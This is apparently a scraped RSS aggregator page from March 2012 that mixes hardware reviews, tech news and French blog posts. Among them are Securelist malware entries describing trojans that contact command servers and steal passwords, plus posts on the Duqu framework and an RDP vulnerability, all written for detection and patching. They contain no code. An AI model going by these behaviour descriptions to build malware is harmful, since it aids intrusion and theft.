Almost 15 years ago I set up my first multiple monitor system, using a 17” and a 15” CRT. At that time it was a very uncommon setup, but now it seems that many people use multiple displays to manage their workspace. No matter how many displays you hook up, there are always some things that benefit from having a single, large, high resolution desktop, such as the spreadsheets that I use for doing display reviews.

27” and 30” displays with 2560 horizontal pixels have been available for a few years now, though the pricing on them has been very high that whole time. Sometimes you can find a display on sale and pick it up for a reasonable price, but typically the cost of entry seems to be right around $1,000 and up. Because of this people are still likely to buy two, or even three, 1920x1200 displays for the same price and run a multi-monitor desktop.

We finally have our first real affordable 27”, high resolution display on the market now, and it comes courtesy of HP. The HP ZR2740w is a 27” IPS panel with 2560x1440 resolution (16:9 aspect ratio) and an LED backlighting system. With a street price that comes in at $700 or below, what has HP done to be able to bring a high resolution display to the masses at a price well below other vendors? Thankfully, they provided me with a unit so I could evaluate it and see.

Channel Image06:00 FirePro V3900: Entry-Level Workstation Graphics» Reviews Tom's Hardware US
FirePro V3900: Entry-Level Workstation GraphicsAMD's new FirePro V3900 is the company's low-profile, entry-level workstation graphics card. It's priced to compete against Nvidia’s Quadro 400. Today we're putting it up against Nvidia’s Quadro 400 and five other professional and desktop graphics cards.
Channel Image03:23 Archos 35 Home Connect Review: Android at the Bedside» AnandTech

Over the last few years of smartphone ownership, one of the most satisfying and somewhat surprising uses has been listening to good old fashioned FM radio, streamed through the internet and to my phone. They're not ideal for this, certainly. Phone speakers are tolerable at best for music, and often not loud enough to fill a room. And streaming, especially in WiFi dead spots around your house, can deplete your phone's battery quickly. And yet, dedicated internet radio devices have remained a bit of a niche; and a niche often reserved for those with money to spare. The earliest internet radio device, the Kerbango was a $300 flop, whose legacy (if not looks) and price carry on with Tivoli Audio’s Networks internet radio. And though cheaper devices have rolled out, including Logitech’s Squeezebox, the prospect of buying a device solely dedicated to streaming internet radio limits the appeal to buyers. 

Archos, no stranger to undercutting on price and focusing on media playback, introduced their Archos 35 Home Connect last year, to compete in this space by leveraging Android to bring more than just internet radio to your home. Priced at $130, Archos has basically taken 2010-era smartphone internals (TI's OMAP 3630, indeed) and strapped them to a pair of speakers and a 3.5” screen. Does this repurposing of Android make for a compelling buy? Let’s find out.

Lots of Gray

The design of the Home Connect is simple, if a little bland. The 3.5” screen is centered on the device and flanked by the speakers. The traditional Android controls (back, menu, search and home) are joined by volume controls as soft buttons just below the screen. A VGA front-facing camera sits just above the screen, and around back we find a microSD slot, micro USB port (for power and PC-connection), 3.5 mm headphone jack and a power button. The casing is glossy, grey plastic and though there’s a certain heft to the device, this doesn’t feel like a device that would survive a terribly large fall. 

 

The display uses a TFT panel, which lacks in resolution and image quality. At 480x272, and producing washed out colors and blacks not much darker than the case, you probably won't watch a lot of video on this screen. This, despite Archos typical dedication to including extensive video codec and container support. More frustrating than the display, is the touchscreen layer. I’ve never met a resistive touchscreen I’ve liked, and though this one is no more offensive than any other, it’s still the most frustrating aspect of the Home Connect. Key presses are often missed and swipe gestures are an exercise in frustration. Some hardware buttons could have gone a long way to remedying the problem, particularly if a directional pad were included. Better still, swapping the resistive layer for a capacitive one would be like mana from heaven. 

Gallery: Archos 35 Home Connect Review: Android at the Bedside

Android As An Appliance

Though they tout the nearly limitless number of internet radio streams available, Archos doesn’t advertise this simply as an internet radio. Leveraging Android as the operating system means that the device is as versatile as the apps you can install (on Android 2.2, at least). Pre-installed apps are mainly media centric, though Tango is included for video calling. Angry Birds is the only truly surprising inclusion; if scrolling on a resistive screen is difficult, gaming is torturous. To download new apps users use a special version of AppsLib, whose catalog is broad, but unimpressive. The top free app is a Google Apps installer that grants the device Market access, a suitable testament for AppsLib’s selection. With Market installed the limiting factor is that resistive screen. Media streaming apps (Netflix, Pandora, etc) work well, though inputting usernames and passwords is challenging. Productivity and messaging apps are made almost unusable by the touchscreen, but then you probably have a phone, tablet or PC nearby for that. There’s just no getting around it, Android notwithstanding, this is a streaming device first and foremost. 

The pre-installed internet radio app is one of the best, Tune-In Radio Pro. The parent company RadioTime, first developed an engine for aggregating internet radio streams in 2003 and is put to use in Logitech’s Squeezebox and other streaming devices. The Tune-In Radio app was introduced in 2008, and after a few years has matured into a feature rich, stable service with apps on iOS, Android, BlackBerry and Windows Phone devices. The “Pro” edition of the app caches content allowing users to pause and time shift streams. It’s not quite Tivo-esque since there’s no facility for scheduling recordings, but a nifty feature for live content, or playing back a song. Users can easily search for streams based on genre, location or name. Station and track data is updated on screen, on streams where it’s available, and the interface is easy to use, if a little drab. 

Gallery: Archos 35 Home Connect - Screen Gallery

So, we’ve settled on this as a media playback device, how’s it do? Tivoli’s speakers are all high-end components designed to match their top dollar price. These . . . are not. That’s not to say they’re without merit. Indeed, if you’re used to listening to music through your phone’s speaker, this is much better. Stereo separation isn’t huge, but volume is much better and the range is sufficient for internet audio streams. As a frequent NPR listener the speakers seem perfect for the spoken voice, with a broad resonance that gives voices a fullness that a small phone speaker fails to do. Music doesn’t have the impact that a set of larger speakers and separate sub woofer would, but there’s much more bass available than on your phone. Sound is mostly distortion free as you raise the volume, though I suspect the speakers could be driven louder and Archos simply set 100% to be well within the speakers capabilities. Audio then, is great for an Android device, but won’t wow those who’ve bought anything from B&O. 

Though typical use case is as a plugged-in device, the home connect does have a battery, so it can be carried around untethered (but within range of your wireless network). Battery life while streaming isn’t quite all-day, figuring closer to four hours than eight, but if you’re around the house you’re probably not too far from a microUSB charger no matter what room you’re in. WiFi range is as good around my house as any other WiFi connected devices, though the thick walls of this old house make horizontal penetration much worse than vertical. Though 802.11 a/b/g/n is offered, users are limited to 2.4 Ghz bands, making it vital to position it farther from your microwave for kitchen use. 

Wrap-up

With the 35 Home Connect, Archos tries to answer the question, "Is Android a good platform for an internet appliance?" Past internet appliance efforts (the Chumby among them) have found little traction; while streaming audio devices have been hampered by their limited abilities and high cost. While the 35 Home Connect acquits itself well as an audio streamer, it falls short as a broader internet appliance. The display is adequate, and the Android build is stable and effective. But a resistive touchscreen makes the experience less than stellar. Being able to expand services by adding apps (like Spotify) make this device competitive with other devices at the same price point. But there’s just no getting around the fact that Android is a touch interface, and if touch response is lacking, the experience just won’t cut it. That said, I love the idea of the Home Connect and hope Archos (and others) continue to refine the genre. Same device with an OLED screen and capacitive touch, and you have a real winner.  

{Ed. note: We've foregone presenting our usual testing data because of the nature of this product. If you're a developer or just curious, feel free to e-mail me at the by-line link and I'd be glad to share.}

Channel Image01:21 Rethinking robots at Innorobo 2012» BBC News - Technology
Why humanoid robots may be an unrealistic dream

Thu 15 March, 2012

Channel Image22:15 Apple's A5X Die (and Size?) Revealed» AnandTech

iFixit saved us all a whole lot of trouble and performed a teardown of the new iPad announced last week. The internals were mostly what we expected, down to the Qualcomm MDM9600 LTE baseband. Despite many of the new iPad's specs being a known quantity prior to launch, there were a few surprises in the teardown.

First and foremost, Apple has moved away from a PoP (Package-on-Package) stack with the A5X SoC and now uses two discrete DRAM devices. The iPad iFixit took apart featured two 512MB Elpida LP-DDR2 devices on the side of the PCB that doesn't feature the A5X (in yellow, below). The A5 SoC featured a dual-channel (2x32-bit) LP-DDR2 memory interface running at up to an 800MHz data rate.

Elpida, like most DRAM manufacturers, does a terrible job of keeping its part number decoders up to date publicly so these two devices (B4064B2MA-8D-F) aren't well documented. The first character in the part number ("B") tells us that we're looking at mobile/low-power DDR2 memory. The next two characters ("40") typically refer to the device density, the 4 in this case likely means 4Gbit while the 0 is a bit odd since it usually refers to DRAM page-size. It's the fourth and fifth characters that are a bit odd to me ("64"). Usually these tell us the width of the DRAM interface, the 64 would imply something that doesn't appear to be true (initial memory bandwidth numbers don't show any increase in memory bandwidth). It's quite possible that I'm reading the part number incorrectly, so if anyone out there has an updated source on Elpida (and other) DRAM part numbers please do share. Update: The 64 doesn't imply a 64-bit interface as we can see from this datasheet. The two devices are 32-bits wide each, unchanged from A5 implementations. Thanks ltcommanderdata!
 
As you might have guessed from the fact that Apple now adorns the A5X with a metal heatspreader, Apple has potentially made the shift from a wirebond package to flip-chip. What you're looking at in the shot above with the heatspreader removed is the bottom of the A5X die. If you were to drill down from above you'd see a layer of logic then several metal layers. Moving to a flip-chip BGA package allows for better removal of heat (the active logic is closer to the heatsink), as well as enabling more IO pins/balls on the package itself. Running gold wires from a die to the package quickly becomes a bottleneck as chip complexity increases. 
 
Note that it is possible for Apple to have used flip-chip in the A5 and simply hidden it under the PoP memory stack. Intel's Medfield for example uses a FC-BGA package but will be covered by DRAM in a PoP configuration.
 
Update: Chipworks has actually measured the A5X die: 162.94mm^2. This means that our visual inspection was inaccurate and Apple is likely still on a 45nm process, which would explain the unchanged CPU clocks. This also helps explain the move away from a PoP stack. At 45nm the A5X's worst case thermals (heavy GPU load) probably demand much better cooling, hence the direct attach heatspreader + thermal paste.
 
Using the Toshiba eMMC NAND that resides next to the A5X as a reference, we can come up with a rough idea of die size. Based on Toshiba's public documentation, 24nm eMMC 16GB parts measure 12mm x 16mm. Using photoshop and the mystical power of ratios we come up with a rough estimate of 10.8mm x 10.8mm for the A5X die, or 117.5mm^2. If you remember back to our iPad analysis article, we guessed that conservative scaling on a 32nm process would give Apple a ~125mm^2 die for the A5X. While there's a lot of estimation in our methodology, it appears likely that the A5X's die is built on a 28/32nm process - or at least not a 45nm process. Note that this value is entirely dependent on the dimensions of Toshiba's NAND being accurate as well as the photo being as level and distortion-free as possible. 
 
I'll chime in a little later to talk about A5X SoC performance.
 
Images courtesy iFixit

Channel Image20:35 Assorted Schneier News Stories» Schneier on Security
I have several stories in the news (and one podcast), mostly surrounding the talks I gave at the RSA Conference last month....
Channel Image19:47 SEO : préférez les suffixes DNS de premier niveau !» Denis Szalkowski Formateur Consultant
Même s'il peut y avoir une logique à choisir un suffixe de domaine régional, préférez, pour construire votre visibilité dans les moteurs, un suffixe DNS de premier niveau.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image18:32 Kubuntu Active is Activated» blogs.kde.org blogs

The first Ubuntu flavour for tablets is now making daily builds. We even got our first bug reports from our localy Plasma Active upstreams. Images are for i386 only for now, ARMv7 should be added when we know it's a bit more stable and have testers.

The logo above is only an idea, it's the extent of my SVG skills. I also updated the blogs.kde.org poll :)

Channel Image17:00 Sondage: Allez-vous passer à Ivy Bridge ?» HardWare.fr
Channel Image16:30 Focus: 34 cartes mères Z77 Express» HardWare.fr
Channel Image16:15 Trojan-Downloader.JS.DarDuk.hz» Securelist / Descriptions
When visiting infected website, the malicious content activates. The user sees empty page with “Please wait page is loading” text on it. Next, malware checks for the version if the client...
Channel Image16:10 Trojan-Dropper.Win32.Injector.cwdb» Securelist / Descriptions
Using the Task Manager terminate all processes with name “explorer.exe” Start Regedit from the Task Manager and do the following: Temporary rename “...
Channel Image16:02 Trojan.Win32.Agent.fw» Securelist / Descriptions
Using the Task Manager terminate all processes with name “explorer.exe” Start Regedit from the Task Manager and do the following: Temporary rename “...
Channel Image15:58 Trojan-Dropper.Win32.Injector.cula» Securelist / Descriptions
When installed into the system, it connects to remote Command and Control center (C&C) every few minutes and receives additional instructions. It can be a command to download new malicious...
Channel Image15:54 Trojan-PSW.Win32.FTPasso.ce» Securelist / Descriptions
It enumerates existing active/connected Remote Desktop and Local users, analyze content of each session and steals possible key sequence (passwords, user names, startup info, etc), There is no any IP...
Channel Image15:38 Trojan-PSW.Win32.FTPasso.cf» Securelist / Descriptions
This is a Dll that implements password stealing, desktop hijacking, generic communication methods with specified remote server. Typically, another component of this malicious bundle installs this Dll...
Channel Image14:29 Diablo III Coming on May 15» AnandTech

After a few delays and many recitations of Blizzard's "We'll release it when it's ready" mantra, Diablo III finally has a release date: May 15th. On that date, Blizzard's click-heavy action RPG will be available on PC and Mac for $59.99 USD in almost every region. Latin American and Russian players will need to wait until June 7th.

Digital presales for Diablo III start today, World of Warcraft players interested in picking up a free copy may still do so by purchasing a WoW Annual Pass before May 1st.

For interested parties, Blizzard will also be selling a Diablo III Collector’s Edition for $99.99. The retail exclusive package includes a behind-the-scenes Blu-ray/DVD set, a soundtrack CD, a 208-page art book, and a 4GB USB trinket carrying full versions of Diablo II and Diablo II: Lord of Destruction. It will also come with exclusive content for Diablo III, World of Warcraft, and Starcraft II: Wings of Liberty – most likely in-game items along the lines of a WoW minipet.

The press release touts Diablo III’s real money auction house and robust Battle.net-based matchmaking, yet it makes no mention of the planned player-versus-player arena. This is likely because Diablo III will be launching without it. “The PvP game and systems aren’t yet living up to our standards,” Blizzard’s Jay Wilson wrote on Battle.net last week. “After a lot of consideration and discussion, we ultimately felt that delaying the whole game purely for PvP would just be punishing to everyone who’s waiting to enjoy the campaign and core solo/co-op content.”

Source: Blizzard

Channel Image13:31 Mediyes - the dropper with a valid signature» Securelist / Blog

Post was updated 19.03.2012 (see below)

In the last few days a malicious program has been discovered with a valid signature. The malware is a 32- or 64-bit dropper that is detected by Kaspersky Lab as Trojan-Dropper.Win32.Mediyes or Trojan-Dropper.Win64.Mediyes respectively.

Numerous dropper files have been identified that were signed on various dates between December 2011 and 7 March 2012. In all those cases a certificate was used that was issued for the Swiss company Conpavi AG. The company is known to work with Swiss government agencies such as municipalities and cantons.


Information about the Trojan-Dropper.Win32.Mediyes digital signature

Channel Image11:17 Hynix concentré sur la NAND» HardWare.fr
Channel Image08:01 The Razer Blade Review» AnandTech

Razer is, first and foremost, a gaming company. From the company slogan (“By gamers, for gamers”), to partnerships with a number of the most popular game development studios, even the job title on the CEO’s business card (it reads Chief Gamer), nothing about Razer is shy about who the target market is. But it’s key to note that Razer is a gaming company which has focused on gaming-related peripherals and accessories—mice, keyboards, headsets, controllers, and limited edition peripherals for specific games. But that all changes as of now. 

The vessel of change in question: Razer’s new Blade, a 17” gaming laptop that bucks almost all of the common trends in gaming-focused desktop replacements. Heralded by Razer as the “World’s First True Gaming Laptop”, the Blade packs a 2.8GHz Core i7-2640M, NVIDIA’s GT 555M dGPU, 8GB of memory, a 256GB SSD, and a 17.3” 1080p display into an enclosure that’s just 0.88” thick and weighs 6.4lbs. If Intel were to extend the ultrabook hardware guidelines out to 17” notebooks, the Blade would hit them pretty dead on. It’s pretty clear right off the bat that Razer wasn’t aiming at the gargantuan six-core SLI notebooks out there—in fact, on paper the Blade looks a bit like the Windows answer to the 17” MacBook Pro.

This isn’t the first time that Razer has shown intent to play in the gaming hardware space, having shown off the impressive Switchblade concept system at CES 2011. The Switchblade design concept clearly had a major influence on the Blade as is evident from the Switchblade UI panel on the side of the keyboard, but what’s important to note with the Blade is that it shows just how serious Razer is about transitioning into PC hardware and gaming systems. Read on to see how it fared.

Channel Image08:00 iBUYPOWER Erebus GT: Custom Cooling for Less» AnandTech

Boutique gaming desktops are nothing new around here; while enthusiasts may readily dismiss them, it's easy to forget they do serve a purpose and a market beyond the do-it-yourself crowd. There are certain things even a lot of enthusiasts, myself included, aren't able to do that boutiques can; specifically, assembling custom liquid cooling loops. The last one of these we saw was Puget Systems' Deluge, a behemoth of a machine that retailed for more than seven grand.

Today iBUYPOWER is making available a system with many of those same perks at a fraction of the cost. The Erebus GT uses an entirely custom enclosure, has a laser-etched panel window with white LED lighting, and most importantly includes a custom liquid loop attached to a massive top-mounted radiator that cools the CPU and GPU. Can iBUYPOWER deliver a truly compelling boutique build at a reasonable price without cutting any corners? Let's find out.

Channel Image06:00 Best Graphics Cards For The Money: March 2012» Reviews Tom's Hardware US
Best Graphics Cards For The Money: March 2012This month's update covers AMD's new Radeons HD 7750, 7770, 7850, and 7870 graphics cards, along with the disappearing Radeon HD 6950 and 6970. Plus, we consider the value of Nvidia's GeForce GT 440 GDDR5 now that the Radeon HD 5670 is unavailable.

Wed 14 March, 2012

18:46 INNOROBO : L'évolution de la robotique au service de l'industrie et de la recherche» securite informatique - Yahoo! News Search Results
Le grand rendez-vous international des acteurs de la robotique se tient de ce mercredi 14 au vendredi 17 mars au centre des congrès de la Cité Internationale de Lyon. L'occasion pour Clubic d'aller po [...]
Channel Image17:23 Trojan.Win32.Inject.afli» Securelist / Descriptions
Once launched, the Trojan decrypts and extracts the following file from its body to the current user's temporary folder: %Temp%<rnd1>.tmp where <rnd1> is a random set of numbers and...
Channel Image17:17 Trojan.Win32.Autoit.ci» Securelist / Descriptions
Once launched, the Trojan performs the following actions: It attempts to connect to the following HTTP servers: 87.***.14 69.***.224 It creates the directory: %System%\<rnd> where <...
Channel Image17:13 Trojan.MSIL.Purswapper.a» Securelist / Descriptions
This Trojan has a malicious payload. It is a Windows .Net application (PE EXE file). It is 5120 bytes in size. It is written in Visual Basic .Net.
Channel Image10:22 OpenBSD 5.1 Pre-Orders Started, New Song, Audio CD » OpenBSD Journal
As Theo de Raadt (deraadt@) announced in a message to the misc and announce mailing lists, pre-orders for the upcoming OpenBSD 5.1 have opened.

Date: Tue, 13 Mar 2012 20:47:24
From: Theo de Raadt 
To: announce@cvs.openbsd.org
Subject: pre-orders activate for OpenBSD 5.1

It is that time again.  I have just activated pre-orders for CDs,
tshirts, and posters for the 5.1 release -- due May 1.

    http://openbsd.org/orders.html

At the same time, I am making available the song that will come out
with the release (hmm, it is still moving out to the ftp mirrors at
the moment, but that is ok).  The song and details of it are linked
from:

    http://openbsd.org/lyrics.html

And this time there's even more goodies available for you to grab for your collection.

Read more...

Channel Image06:00 Four ATX Cases For High-Capacity Water Cooling, Reviewed» Reviews Tom's Hardware US
Four ATX Cases For High-Capacity Water Cooling, ReviewedBig radiators need lots of space that most enclosures simply weren't designed to offer. We're using Swiftech’s latest triple-fan cooler to test the fitment and performance in four cases supposedly set up to accommodate high-end water cooling setups.

Tue 13 March, 2012

Channel Image18:41 Patch Tuesday March 2012 - Remote Desktop Pre-Auth Ring0 Use-After-Free RCE!» Securelist / Blog

Patch Tuesday March 2012 fixes a set of vulnerabilities in Microsoft technologies. Interesting fixes rolled out will patch a particularly problematic pre-authentication ring0 use-after-free in Remote Desktop and a DoS flaw, a DoS flaw in Microsoft DNS Server, and several less critical local EoP vulnerabilities.

It seems to me that every time a small and medium sized organization runs a network, the employees or members expect remote access. In turn, this Remote Desktop service is frequently exposed to public networks with lazy, no-VPN or restricted communications at these sized organizations. RDP best practices should be followed requiring strong authentication credentials and compartmentalized, restricted network access.

Some enterprises and other large organizations continue to maintain a "walled castle" and leave RDP accessible for support. The problem is that RDP-enabled mobile laptops and devices will make their way to coffee shops or other public wifi networks, where a user may configure a weak connection policy, exposing the laptop to attack risk. Once infected, they bring back the laptop within the walled castle and infect large volumes of other connected systems from within. To help enterprises that may have patch rollout delays, Microsoft is providing a fix-it that adds network layer authentication to the connection, protecting against exploit of the vulnerability.

This past fall, we observed the RDP worm Morto attacking publicly exposed Remote Desktop services across businesses of all sizes with brute force password guessing. It was spreading mainly because of extremely weak and poor password selection for administrative accounts! The Morto worm incident brought attention to poorly secured RDP services. Accordingly, this Remote Desktop vulnerability must be patched immediately. The fact that it's a ring0 use-after-free may complicate the matter, but Microsoft's team is rating its severity a "1" - most likely these characteristics will not delay the development of malicious code for this one. Do not delay patch rollout for CVE-2012-0002.

Finally, for less technical readers, allow me to explain a little about what a "Remote Desktop pre-auth ring0 use-after-free RCE" really is. Remote Desktop is a remotely accessible service that enables folks to connect remotely to a Windows system and open a window to the desktop in an application as though you were sitting in front of the computer. Usually, you need to log in to the system to do that, so the system is fairly protected. Unfortunately, this bug is such that a remote attacker that can connect to the system's Remote Desktop service over the network can successfully attack the system without logging in. The "ring0" piece simply means that the vulnerable code exists deeply in the Windows system internals, or the kernel, of the operating system (most applications running on a system run in "ring3", or "user-mode"). "Use-after-free" is the type of vulnerability enabling the exploit, and this type of flaw is something that continues to be extremely difficult to weed out as predicted years ago, even as many of the more traditional low hanging stack and heap overflows have been stomped out by automated code reviews and better coding practices. And finally, RCE applies to the type of exploit enabled by the vulnerability, or "remote code execution", meaning an attacker can deliver malicious code of their choosing to the system and steal everything. There you go, "pre-auth ring0 use-after-free RCE".

Channel Image17:00 Trojan_Clicker.JS.Iframe.fq» Securelist / Descriptions
If your computer does not have antivirus protection and has been infected by this malicious program, follow the instructions below to delete it: Delete the original Trojan file (its location will...
Channel Image16:58 Trojan.JS.Fraud.ao» Securelist / Descriptions
If your computer does not have antivirus protection and has been infected by this malicious program, follow the instructions below to delete it: Delete the original Trojan file (its location will...
Channel Image06:00 Workstation Storage: Modeling, CAD, Programming, And Virtualization» Reviews Tom's Hardware US
Workstation Storage: Modeling, CAD, Programming, And VirtualizationWe use a mixture of real-world and synthetic benchmarks to quantify storage performance in our reviews. But how do you know our methodology is sound? We decided to test several workstation-oriented apps in order to generate real-world performance data.

Mon 12 March, 2012

Channel Image09:47 VIDEO: Smart tech transforms the kitchen» BBC News - Technology
Some of the latest gadgets that could soon be making waves in your kitchen.
Channel Image08:15 Impossibilité soudaine de télécharger des .exe avec Firefox» Denis Szalkowski Formateur Consultant
Plus de possibilité de télécharger d'exécutables à partir de Firefox !Après une mise à jour effectuée via Windows Update, je me suis retrouvé dans l'impossibilité de télécharger des exécutables à partir de Mozilla Firefox sous Windows Server 2008 R2

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image07:11 Informatique 2012 – Semaine 9» Denis Szalkowski Formateur Consultant
Au menu : Nvidia qui rejoint la fondation Linux, MySQL Cluster 7.2, MariaDB 5.3.5,la croissance qui ralentit dans le secteur du service et du logiciel, le salaire des développeurs, le PC qui n'en finit pas de mourir, les SSII qui dégraissent en France sans plan social, la fibre à 400 GBit/s, la taxe Google bientôt en Allemagne, 2xmoinscher.com qui se termine, Decitre, Cultura, Méheut qui s'émeut des dangers que fait planner Google sur le cinéma français !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 What Does DirectCompute Really Mean For Gamers?» Reviews Tom's Hardware US
What Does DirectCompute Really Mean For Gamers?We've been bugging AMD for years now, literally, to show us what GPU-accelerated software can do. Finally, the company is ready to put us in touch with ISVs in nine different segments to demonstrate how its hardware can benefit optimized applications.

Sat 10 March, 2012

Channel Image19:18 Merci à Free pour avoir réduit ma facture Orange de 40% !» Denis Szalkowski Formateur Consultant
-40% avec Orange Open 1Merci à Free et à Xavier Niel, pour m'avoir permis une réduction de près de 40% de ma facture Orange !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image16:35 RJ TextEd - v8.02 Multi (Fr)» ToutFr.com - Les traductions mises à jour
RJ TextEd est un outil de développement web et un éditeur de texte Unicode.
Channel Image06:33 CanSecWest: Let's talk about non-targeted attacks» Securelist / Blog

Today is the last day of CanSecWest - a security conference taking place in Vancouver, Canada. On Wednesday I filled in for Costin Raiu and talked about our forensics work into Duqu's C&C servers.

As I'm writing this, Google Chrome just got popped. Again. The general feeling is that $60k, even with a sandbox escape, isn't a whole lot of money for a Chrome zero-day. So, to see multiple zero-days against Chrome is quite the surprise, especially when considering the browser's Pwn2Own track record.

Separately, I found the Q&A session following Facebook's Alex Rice’s presentation immensely intriguing.

Fri 09 March, 2012

Channel Image10:47 Veille : sites similaires !» Denis Szalkowski Formateur Consultant
En dehors de SimilarSites, bien peu de choses à se mettre sous la dent en matière d'outils de recherche de sites similaires !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 Open-E's DSS V6: Storage Software Set Up, Managed, And Benchmarked» Reviews Tom's Hardware US
Open-E's DSS V6: Storage Software Set Up, Managed, And BenchmarkedWe got our hands on one of Thecus' eight-bay N8800PRO storage appliances for the purpose of taking Open-E's Data Storage Software V6 out for a test drive. Read on as we set up, manage, and benchmark this marriage of storage-oriented hardware and software.

Thu 08 March, 2012

Channel Image19:57 CeBIT 2012» blogs.kde.org blogs

"CeBIT is big. Really big. You just won't believe how vastly, hugely, mind-bogglingly big it is. I mean, you may think it's a long way down the road to the chemist's, but that's just peanuts to CeBIT."

I popped along to CeBIT for a day to browse the world's biggest technology show and say hi to the lovely KDE people who were running a stand there.

Ingwa was there in his smartest suit to look all professional. Friedrich and eckhart kept the punters enthused about KDE all day. Claudia and me met with a potential new Akademy sponsor. And Aaron turned up with his fabled Spark.

DSCF6627
KDE's stall was in building 2 of 26.

DSCF6643
KDE's finest demonstrating the world's finest consumer software to suits

DSCF6641
The Ubuntu stand is organised by Ubuntu-DE (many of whom use KDE)

DSCF6637
Ingwa acts as booth babe to the Spark Tablet

DSCF6639
Amazing what you find at CeBIT, Xompu is a German company who make simplified UIs with Plasma, awesome. This article says it runs Kubuntu. Awesomer.

After the show the large stalls all out-compete each other to have the coolest after party. You could easily become an alcoholic by staying there all week, I got free lager and weiner from some a regional government of germany, free posh beer from some company or other and free cocktails from Citrix I think it was although nobody wanted to talk to me about Citrix. And I can't even drink much more than a sip of alcohol.

Channel Image07:27 Chiffrement des pages de résultats de recherche : aucun referer dans les logs Apache !» Denis Szalkowski Formateur Consultant
Google se tire une balle dans le pied !Les requêtes chiffrées - de type https - en provenance du moteur de recherche Google ne contiennent aucun referer, dans les logs du serveur Apache. Elles ne peuvent pas être vues comme issues de la recherche dite organique !!!

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 In Pictures: Four ATX Cases Perfect For High-Capacity Water Cooling» Reviews Tom's Hardware US
In Pictures: Four ATX Cases Perfect For High-Capacity Water CoolingBig radiators facilitate lots of cooling power without much noise. But taking the plunge into water also requires a specially-designed case. We inspect the layout and features of four 3 x 120 mm-capable chassis prior to our upcoming performance analysis.

Wed 07 March, 2012

Channel Image16:58 The Mystery of the Duqu Framework» Securelist / Blog

While analyzing the components of Duqu, we discovered an interesting anomaly in the main component that is responsible for its business logics, the Payload DLL. We would like to share our findings and ask for help identifying the code.

Code layout

At first glance, the Payload DLL looks like a regular Windows PE DLL file compiled with Microsoft Visual Studio 2008 (linker version 9.0). The entry point code is absolutely standard, and there is one function exported by ordinal number 1 that also looks like MSVC++. This function is called from the PNF DLL and it is actually the “main” function that implements all the logics of contacting C&C servers, receiving additional payload modules and executing them. The most interesting is how this logic was programmed and what tools were used.

The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of “slices” of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions and user-written code, except the biggest slice that contains most of C&C interaction code.

Layout of the code section of the Payload DLL file

This slice is different from others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. We call it the Duqu Framework.

Channel Image15:44 Formation Administration PostgreSQL» Denis Szalkowski Formateur Consultant
PostgreSQLCette formation de 4 jours a pour objet de vous donner les moyens d’administrer la base de données Open Source PostgreSQL, sous environnement Linux.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image13:42 PostgreSQL : tuer la session d’un utilisateur» Denis Szalkowski Formateur Consultant
PostgreSQL permet assez simplement la destruction de la session d'un utilisateur. Vous devez toutefois pouvoir agir au niveau du système d'exploitation.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image12:01 PostgreSQL : créer, supprimer un trigger» Denis Szalkowski Formateur Consultant
PostgreSQL : créer, supprimer un triggerEn matière de base de données, l'utilisation de triggers - ou déclencheurs - reste incontournable. Les triggers sous PostgreSQL s'appuient sur des fonctions que vous aurez pris soin de créer préalablement.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image11:22 PostgreSQL : créer et utiliser des datalinks» Denis Szalkowski Formateur Consultant
PostgreSQL : créer et utiliser des datalinksA la manière d'Oracle, PostgreSQL offre la possibilité d'utiliser des liens de bases de données ou datalinks.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image09:14 Elections 2012 and DDoS attacks in Russia» Securelist / Blog

As Eugene Kaspersky had written earlier, we were expecting new DDoS attacks on resources covering the Russian presidential election. So, as the country went to the polls on 4 March, we were on the lookout for new DDoS attacks.

We were surprised to hear a news report from one mass media source that claimed a series of attacks from foreign countries had targeted the servers responsible for broadcasting from polling stations. The announcement came at about 21:00, but there was no trace of any attack on our monitoring system. The media report did not clarify exactly what sort of attacks had been staged. Instead of a DDoS attack, the journalists might have been referring to a different method of seizing unauthorized access, such as an SQL injection.

Channel Image06:00 Best Gaming CPUs For The Money: March 2012» Reviews Tom's Hardware US
Best Gaming CPUs For The Money: March 2012March sees AMD's Phenom II X6 1045T hit retail. The FX-8150's price dropped, plus we have info on the FX-4170 and FX-6200. Intel gives us new Core i5-2380P and -2450P CPUs, plus Core i7-2550K, -3820, and the Xeon E5s. Price reductions abound, too.

Tue 06 March, 2012

Channel Image18:00 Intel Xeon E5-2600: Doing Damage With Two Eight-Core CPUs» Reviews Tom's Hardware US
Intel Xeon E5-2600: Doing Damage With Two Eight-Core CPUsIntel's vaunted Sandy Bridge architecture has finally made its way to the company's dual- and quad-socket-capable Xeon processors. We got our hands on a pair of eight-core Xeon E5-2687W CPUs to compare against the older Xeon 5600- and 5500-series chips.
Channel Image14:29 Informatique 2012 : semaines 7 et 8» Denis Szalkowski Formateur Consultant
Soeur Anne, je vous vois venir !Au menu de ces deux dernières semaines : l'algorithme de cryptage RSA sur la sellette, une panne mondiale pour le cloud de Microsoft, les anonymous qui veulent s'en prendre aux DNS mondiaux, Yslow sous licence BSD, Apache en version 2.4, Ksplice pour les mises à jour à chaud du noyau Linux sous Red Hat, Boot2Gecko, les spécialistes Linux demandés, le coût d'un PC, les CMs des candidats à la Présidentielle, 9% de télétravailleurs, le cloud qui fait peur, HP dans la tourmente, Adobe obligé de repenser sa stratégie, les logiciels à l'origine du stress au travail, un ordinateur entre 20 et 25 euros, IBM qui licencie, les brevets de Cuil rachetés par Google, les mollahs iraniens qui coupent Internet, Twitter qui se lie à Yandex, dépôts de plainte pour Google, la région Pays du Loire qui s'essaie au journalisme, Free qui gagne 400000 abonnés, deux licenciements Facebook cassés par la cour d'appel de Versailles.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

